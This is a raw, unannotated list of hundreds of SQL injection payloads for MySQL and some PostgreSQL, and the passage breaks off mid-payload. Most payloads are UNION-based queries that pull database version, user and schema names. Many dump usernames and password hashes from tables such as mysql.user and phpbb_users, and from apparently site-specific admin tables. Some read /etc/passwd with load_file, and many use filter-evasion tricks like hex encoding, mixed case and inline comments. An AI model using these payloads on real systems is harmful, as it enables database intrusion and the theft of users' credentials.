463 and 1=0 union select 1,concat_ws(0x3a,version(),database()) -- 464 and 1=0 UNION SELECT 1,2,version() -- -464 union select 1,2,3,4,concat_ws(0x3a ,user(),database(),version()),6,7,8,9,0,1,2,3,4,5,6,7,8 -464 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/* -464 union select 1,version(),3,4,user(),6,7,8,9,10,11,12,13,database(),15,16,17,18,19,20,21,22,23,24,25,26,27/* -465018 union select 1,2,3,4,5,6,7,8,concat(user,0x3a,password),10,11,12,13,14 from mysql.user/* -46589 and 1=2 union select concat_ws(char(58),@@version,user(),database(),@@version_compile_os) -- 465 and 1=2 union select 1,2,3,4,unhex(hex(concat_ws(0x3a,version(),user(),database()))),6,5,8,9,10,11,12,13,14-- -465 union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,username,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from users/* -4662 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,version(),78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130-- -4669 union select 1,2,3,4,version(),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22-- -466 union select 1,2,3,4,5,6,7,8,9 -- 466 union select 1,2,concat(user,0x3a,password,0x3a,file_priv),4,5 from mysql.user-- 466 union select 1,2,concat_ws(0x0A,database(),version(),user()),4,5,6,7 -466 union select 1,2,concat_ws(0x3a3a3a,user(),version(),database()),4,5,6,7-- -4671 union select 1,concat(loginname,char(58),password) from cmslist_admin-- 467600000 union select 1,2,3,concat(name,0x3a,hash,0x3a,status),5 from peoples/* -4677 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -4680 union select 1,2,3,unhex(hex(version())),5,6,7,8-- -4682 union select 1,version(),aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6 from mysql.user/* -4682 union select convert(concat(user,0x3a,password,0x3a,host),binary),2,3,4,5,6 from mysql.user/* 468796872 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),4,5,6,7-- -46890 union select concat_ws(char(58,58),user(),database(),version()),2,3,4/* -468 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,concat(login,0x3a,pass) from admins limit 0,1/* 4690000000 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 46-999.9 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5 -- -469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(table_name,0x3a,column_name),16,17,18,19,20,21,22,23 from information_schema.columns where column_name like '%25pass%25'-- -469 union select 1,2,login,4,pas,6,7 from users where id=1/* -469 union select 1,group_concat(0x0b,login,0x3a,password) from users-- 46 and 1=0 Union Select 1,2,3,4,5,6,concat(@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),8,9,10,11,12-- 46 and 1=0 Union Select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x494E43,4,5,6,7,8-- -46 and 1=2 union select 1,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),3-- -46 union select 1,2,3,4,5,6,7 -- -46 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 /* -46 union select 1,2,3,4,5,6,7,8,9,10,group_concat(0x0b,id,0x3a3a,login,0x3a3a,pwd),12,13,14,15 from login_tbl-- -46 union select 1,2,3,4,5,6,7,user(),DATABASE(),VERSION(),11,12,13,14,15,16,17,18,19 -- -46 UNION SELECT 1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),8 -46 union select 1,2,3,4,5,concat_ws(0x3a3a,login,password),7,8,9 from admin -- 46/**/UNION/**/SELECT/**/1,2,3,concat(id,0x3a,username,0x3a,password),5,6,7,8 from admin/**//* -46 UNION SELECT 1,2,3,concat(login,char(58),password),concat(user(),char(58),version(),char(58),database()),6,7,8,9 from users -- -46 union select 1,2,5,4,5,5,concat_ws(0x3a,user(),database(),version()),8/* -46 union select 1,2,concat(user,0x3a,password,0x3a,host),4,5,6,7,8 from mysql.user limit 1,1/* -46 union select 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13,14 -46 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6-- -46 union select 1,2,concat_ws(database(),version(),user()),4-- -46 union select 1,2,version(),4 -- -46 union select 1,2,version(),4,5,6,7,8 from phpbb_users/* -46 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,pass,user,userid),0x71),0x71),3,4,5,6,7,8 FROM user LIMIT 0,1/* 46 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8 LIMIT 1,1/* -46 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11/* -46 union select 1,concat_ws(0x3a,user(),@@version_compile_os,version()),3,4,5,6,7,8,9,10 -- -46 union select 1,concat_ws(0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -46 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11-- -46 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* -46' union select 1,name,3,4,5,6,7,8,9,0,1,12 from users/* -46 union select 1,version(),3,4,5,6,7,8,9-- -46 union select concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- -46 union select concat(database(),0x20,version(),0x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -46 union select concat(username,0x3a,password),2,3 from users/* -46 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5 46 union select concat_ws(0x3a,version(),user(),database())/* -46 union select concat_ws(char(58),username,password) from admin -46 union select group_concat(table_name) from information_schema.tables where table_schema=0x6d61676e69666c65785f7275-- -470 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16-- -470 union select 1,2,concat_ws(char(58),version(),user()),4,concat_ws(char(58),user,password) from mysql.user/* -470 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),7,8,9,10,11,12,13,AES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 from mysql.user limit 0,1/* 471 and 1=0 union select 1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,10,11,12,13,14,15,16,17,18 from users-- 471 and version()>4 -471 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user()),0x3a),0x3a),4,5,6,7,8/* -471 union select 1,convert(version() using cp1251),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -471 union select concat(login,0x3a,password,0x3a,Email,0x3a,Icq) from users limit 1,1/* -472 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6-- 472 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10/* -472 union select 1,concat_ws(0x3a3a3a,user,password,file_priv),3,4,5,6,7 from mysql.user -- -472 union select 1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8 from information_schema.columns where column_name like 0x70617373776f7264-- -472 union select TABLE_NAME,2,3,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- 473 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,user(),version(),database()),1,63), FLOOR(RAND(0)*2)))-- -473 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* -473 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38/* 473 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,version(),user(),database()),26-- 473 union select 1,2,3,4,database(),6,7 /* -473 union select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19/* -4740 union select concat_ws(0x3a,user(),database(),version())-- 474 aNd 1=0 UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12 -- -474 and 1=2 union all select 1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14 -- -474' union select 1,2,3 from users -- -474 union select 1,concat_ws(0x3a,username,userpass),3,4,5,6,7 from nakavkaz_megaspravka.cat_users-- -474 UNION SELECT 1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from u45320.phpbb_users limit 1,1-- -474 union select 1,name,3,concat(0x3a,pass),concat(database(),char(58),version()),6,user(),8,9,10,11,12,13 from users/* 4763 and 1=0 union select 1,2,version(),4,5,6,7,8,9,10,11,12 -- -476 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,firstname,lastname,pwd,user_level),12,13,14,user(),16,17,18,19,20,21,22,23,24 from users where user_level=1 limit 2,1 /* -476 union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- -476 union select 1,2,concat_ws(0x3a3a,login,password),4,5,6 from users/* 476 union select 1,concat_ws(0x3b,user(),database(),version()),3,4,5,6,7,8,9,10,11-- -4770 union select 1,concat_ws(0x3a,user,password,file_priv,'mq=off'),3,4,5,6,7,8,9,10,11,12,13 from mysql.user -4780 union select 1,2,user(),4,5,6,7/* 479879865433 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19-- 4798798654 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database())-- 47-999.9 union select 1,concat_ws(user(),version(),database()),3-- -479 union select 1,2,3,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),5,6,7,8,9,10,11,12,13,14 -- -479 union select 1,concat_ws(0x3a,version(),database(),user()),3 -- -47 and 1=0 and 1=0 and 1=0 =null=null Union Select 1,2,3,4,5,6,7,0x4861636B656420627920494E432E,9,10,11,12,13,14,15,16,17,18-- -47 and 1=0 union select unhex(hex(concat_ws(0x3a3a3a,user(),database(),version()))),2-- 47 and 1=2 union select 1,2,3,4,5,6,7,8,group_concat(user,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23 from users-- 47 and 1=47 union select 1,2,table_name,4,5 from information_schema.tables limit 19,1 -- -47 union select 111,2,3,4,5,6,7,8,9,10,1111,2,3,4,5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2,3,4,5,6 from INFORMATION_SCHEMA.TABLES limit 3,1/* 47 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x203a,user(),0x3a,database()),14,15,16,17,18,19,20/* -47 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from admin/* -47 union select 1,2,3,4,5,6,7,8,9,10,11,12 from forum/* -47 union select 1,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables limit 31,1-- -47 union select 1,2,3,4,5,6,7,database 47 UNION SELECT 1,2,3,4,5,6,concat_ws(0x20,user,password,user(),database(),version()),8,9 FROM mysql.user LIMIT 1,1 -47' union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14-- -47 union select 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15 -47 union select 1,2,3,4,5,convert(user() using latin1),7,8,9,10,11,12,13,14,15,16 from mysql.user/* -47 UnIon selECt 1,2,3,4,CONCAT(user(), CHAR(32,45,32), version()),6,7,8,9,10 -- -47 union select 1,2,3,4,concat_ws(0x3a,login,pass,access),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from reg_users limit 0,1/* -47' union select 1,2,3,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),5,6,7,8 -- -47 union select 1,2,3,concat_ws(0x3a3a3a,username,user_password,user_email,user_icq) from phpbb_users limit 5,1 -- -47 union select 1,2,3,version(),5,6/* -47 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9-- 47 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()) FROM users LIMIT 1,1 -47 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -47 union select 1,2,unhex(hex(concat_ws(0x3a,user(),version()))),4,5,6,7,8,9,10,11,12,13,14,15,16-- -47 union select 1,2,user(),4,5,6,7,8 -- -47' union select 1,2,version(),4,5,6,7/* -47 union select 1,concat(ID,0x3a,username,0x3a,password),3,4,5,6 from P_admin/* -47 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11 47 union select 1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* -47 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7538303532 -- 47 union select 1,user(),3,4,5,6 limit 1,1/* -47 union select 1,version(),3,4,5,6,7,8,9 -- 47 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User(),@@version_compile_os),0x71),0x71),2-- -47 union select concat(version(),char(58,58),database(),char(58,58),user())/* 480000000000 UNION SELECT 1,2,3,concat_ws(0x3a ,user(),database(),version())-- 48015 UNION SELECT '0','1',concat_ws(0x3a,version(),user()),'3','4','5','6','7','8','9','10','11' ,'12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36'-- -4805' union select 1,2,concat_ws(0x3a3a,id,username,password),4,5,6,7,8,9 from staff -- 4809 and 1=0 union select 1,2,unhex(hex(version())),4,5,6-- -480' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_Ws(0x3a3a,uname,pwd,super),24,25,26,27,28 from inventory.users -- -480 union select 1,user(),3,4,@@version_compile_os,6,7,version(),database(),0,1,2,3,4-- -48117 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat_ws(0x3a,user(),version(),database()),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -48-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18 -481 union select 1,2,3,unhex(hex(concat_ws(0x3a,version(),user(),database()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -482 union select 1,concat_ws(0x3a3a3a,login,password) from users -- -4834 union select 1,2,3,concat(user_icq,char(58),user_password),5,6,7,8,9 from phpbb_users limit 3,1/* -4835' union select 1,2,AES_DECRYPT(AES_ENCRYPT(user,0x78),0x78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mysql.user limit 1,1/* -48390 union select 1,table_name,3 from INFORMATION_SCHEMA.TABLES limit 1,1/* 483 and 1=0 union selECt 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 from information_schema.tables Where table_schema=0x73696365776562 -- 483) or (select count(*) from (select 1 union select 2 union select 3)x group by concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))-- 483 union select 1,2,0x323030302d30312d3031,4,5,6,7,8,9,0,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)-- -483 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11/* -483 union select 1,2,3,version(),database(),6,7/* 4848-999.9 union select 1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- -484 UnIon selECt 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- -484 union select 1,2,concat_ws(0x3a3a,user_login,user_password),4,5,6,7,8,9,10,11,12,13 from users -- 485 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,username,PASSWORD,ADMIN_TYPE_ID),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from k26_USER -- -4861 union select 1,2,userName,4,5,6,7,8 from users-- 4868 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76 -4868' union select 1,2,3,login,pass,6,7,8,9,0,1 from user where id=1/* -4869 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 486 and 1=0 union select 1,2,3,4,5,6,7,group_concat(table_name separator 0x3a),9 from information_schema.tables where table_schema=0x706B70706462-- -486 union select 1,concat_ws(0x3a3a3a,namn,password,email),3,4,5,6,7,8 from user limit 0,1 -- -487 union select 1,2,3,4,5,group_concat(version(),0x3a,user(),0x3a,database()),7-- -487 union select 1,2,3,version(),database(),user(),7-- -487 UNION SELECT 1,2,CONCAT(Version(),Database(),User()),4,5,6,7,8 -- -487 union select 1,2,pass,4,5,6 from admin -- -48810 union select 1,2,3,4,5,6,7,user(),version(),10,11,12,13,14,15-- -4881' union select 1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13 from phpbb_users limit 1,1-- 488867488077 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 4897999 uNioN seLect concat(login,0x3a,passw),null,null,null,null from users limit 6,1/* 48-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -489 union select 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13,14,15 -489 union select 1,version(),concat_ws(0x2F,id,name,password) from sites limit 2,2/* 48 and 1=0 union select 1,2,group_concat(column_name separator 0x3a),4,5,6,7,8,9 from information_schema.columns where table_name=0x7573657273-- 48 aNd 1=0 /*!UNION*/ SELECT 1,2,version(),4,5,6,7 -- 48 and 1=2 union all select 1,concat(user,char(58),password,char(58)),3 from mysql.user/* 48 and 1=2 union select 1,group_concat(concat_ws(0x3a,username,password)),3,4,5 from admin_audioshare.administrators-- -48 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,version(),user(),database()),18,19,20,21,22,23,24-- -48 union select 1,2,3,4,5,6,7,convert(concat_ws(0x3a,version(),database(),user()) using binary),9,0-- -48 union select 1,2,3,4,5,6,concat_ws(0x3a,user_login,user_pass,user_email),8,9,10,11,12,13,14,15,16,17,18,19,20 from pm_users-- -48 UnIon selECt 1,2,3,4,5,concat_ws(0x3a,login,password),7,8 from admin-- -48 union select 1,2,3,4,concat_ws(0x3a3a3a,login,pass),6,7,8,9 from users -- -48' union select 1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from user -- -48 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6/* -48 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 48 union selecT 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11 48 union select 1,2,3,concat(email,0x3a,password),5,6,7,8,9,0,1,2,3 from customers/* -48 union select 1,2,3,version(),5 -48 union select 1,2,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),4,5-- 48 union select 1,2,concat_ws(0x3a,nickname,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from admins-- -48 /*!UnIoN SeLeCt*/ 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13 -48 union select 1,2,concat_ws(0xEF,version()),4,5,6,7,8,9,10,11/* -48' union select 1,2,group_concat(f_name,char(58),password,char(58),email,char(58),level),4,5,6,7,8,9,10 from users -- -48 union select 1,concat(column_name,char(58),table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns limit 650,1/* -48 union select 1,concat(user(),0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -48 UNION SELECT 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -48 union select 1,concat_ws(0x3a,user_id,user_name,user_password),3,4,5,6,7,8,9 from CPG_users-- -48 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -48 union select 1,convert(concat(version(),char(58,58),database(),char(58,58),user()) using latin1)/* -48 union select 1 from auteurs -- 48 union select 1,unhex(hex(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8-- 48 union select concat_ws(0x3a,0x3a3a3a3a3a3a,version(),database(),user()) 48 union select concat_ws(0x3a,1111,user(),database(),version())-- -48' union select concat_ws(0x3a3a,g_id,g_userName,g_fullName,g_hashedPassword,g_email) from g2_User limit 1,1 -- -48 union select concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2 -- -490' UnIon selECt 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- 490 union select 1,name,3,password,5,6,7,8,9,10 from admin limit 0,1/* -491' union select 1,concat_ws(0x3a,user,password,file_priv,load_file(0x2f6574632f706173737764)),3 from mysql.user/* -49257' union select 1,2,concat_ws(0x3a,id_admin,login,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 from bannsyst.bannsyst_admins/* 492 and 1=cast((SELECT version()||chr(58)||current_user||chr(58)||current_database()) as int)-- -492 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,version(),database(),useR()),60,61 -492 UNION SELECT 1,2,CONCAT_WS(0x3a,id,name,username,email,password),4,5,6,7,8,9 FROM hass.jos_users -4936 union select 1,2,concat(name,0x3a,password),4 from users/* 4939;select null,version()::int,null from pg_user-- -4947 union select 1,members_l_username,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 from ibf_members limit 0,1/* 495-999.9 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 -- -495 UNION SELECT 1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6,7,8,9-- -495 union select 1,user(),version(),load_file(0x2F6574632F706173737764),5,6,7/* 4966 union select version(),2,3,4/* 496ddbbb661f5' and 1=2 union select 1,2,3,4,5,6,concat_ws(CHAR(58,58), username, password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from SecurityCmsUser limit 0,1/* -496 union select 1,2,3,4,5,6,concat_ws(0x3a,user,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21 from mysql.user limit 6,1/* 4973 union select 1,concat(password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14 from accounts limit 3907,1/* 4975 union select null,null,null,null,null-- -497 union select null,concat_ws(0x3a,version(),databasE(),useR()),null,null,null,null,null,null,null -498 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from ems_users limit 2,1/* -498 union select 1,2,3,4,user_password,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 4990 union select 1,2,concat_ws(0x3a,user,password),4,5,6,7 from mysql.user/* -4992' union select 1,2,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14 -- 49-999.9 union select 1,2,3,4,5,6,7,version()-- 4-999.9 union select 1,2,3,version()-- 49 and 0 union select 1,2,3,4,concat_ws(0x3a,username,pass),6 from moh_auth limit 0,1 -- -49 union select 1,2,3 -- -49 union select 1,2,3,4,5,6,7,8 -- -49' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- -49 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 -- -49 union select 1,2,3,4,5,6,7,version(),user(),10,11,12,13,database()/* -49 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -49 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -49 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15 from information_schema.tables limit 1,1-- -49 union select 1,2,3,4,concat(userName,char(58),UserEmail),6,7 from users limit 0,1-- -49 union select 1,2,3,4,concat_ws(0x3a,version(),user(),DATABASE()),6,7,8,9,0,1,2 -- -49 union select 1,2,3,concat_ws(0x203a20,version(),user()),5,6,7,8,9,10,11,12 49' union select 1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12 from ng_users/* 49' union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/* 49 union select 1,2,3,group_concat(0x0b,login,0x3a3a,password,0x3a3a,email),5 from agency-- -49 union select 1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x73),0x73),4,5,6,7,8,9,10 from mysql.user 49 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,login,0x3a3a,password),5 from department-- -49' UNION SELECT 1,2,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),4,5,6-- -49 union select 1,2,concat_ws(0x3a,name,pass),4,5,6,7 from user-- 49 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4,5 -- -49 union select 1,2,concat_ws(0x3a,version(),user(),database()),4 -- -49 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13 49 union select 1,2,group_concat(0x0b,email),4,5 from result-- 49 union select 1,2,table_name,4,5,6 from INFORMATION_SCHEMA.TABLES limit 139,1/* -49 union select 1,concat(userID,char(58),pass,char(32,58,32),email),3,4,5,6,7,8,9,10 from members limit 0,1-- 49 UNION SELECT 1,concat(version(),0x3a,user(),0x3a,database()),3,4 LIMIT 170,2/* -49 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,group_concat(schema_name,0x3a3a),8,9,0,1,2,3,4,5,6 from information_schema.schemata-- -49 union select 1,concat_ws(0x3a,Login,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from linksviptur_admin-- 49 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6 limit 1,1 -49 union select 1,convert(concat_ws(0x3a,version(),user()) using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 49 union select 1,group_concat(table_name separator 0x0b),3,4 from information_schema.tables where table_schema=0x64623237343461-- -49 union select 1,user(),3,4,5,6,7,8,9,0 -- 49 union select 1,user(),3,4,5,6,7,8 limit 1,1/* 49 union SELECT null,null,password,null,null,null,null FROM users -49 union select null,username,user_password from phpbb_users where user_level=1 4' and 0 union select 